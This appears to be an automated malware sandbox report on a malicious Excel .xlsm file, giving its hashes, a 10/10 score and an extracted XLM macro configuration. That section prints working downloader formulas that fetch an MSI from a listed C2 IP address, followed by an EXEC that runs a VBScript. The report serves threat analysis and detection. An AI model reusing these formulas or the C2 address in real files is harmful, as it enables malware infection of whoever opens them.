General

  • Target

    ad1cd20cdf48ccb42ddefd3c3a0033b9

  • Size

    6KB

  • MD5

    ad1cd20cdf48ccb42ddefd3c3a0033b9

  • SHA1

    a5c11e16614a6d206d76fb3b068f2a5128b3fd9c

  • SHA256

    497c758891df758b6b57ed619904acc433ec0a12353faf1162e1ba92cf46ed90

  • SHA512

    84b090f0e571f3db92caa949854ba39b0ee0659cefa5682800bf006cb2f03c0328913f8beda936ef36f4fed14d794c2d29a675f496d7f56fc8d22a62103dde9b

  • SSDEEP

    192:NDSMuSCbrA2OmmfR58UhHFBFYunb98yV8+N:NjuDM2w/1FY+b98yVP

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
    =EXEC("wscript C:\zer\spp.vbs")
    =HALT()

Signatures

Files

  • ad1cd20cdf48ccb42ddefd3c3a0033b9
    .xlsm office2007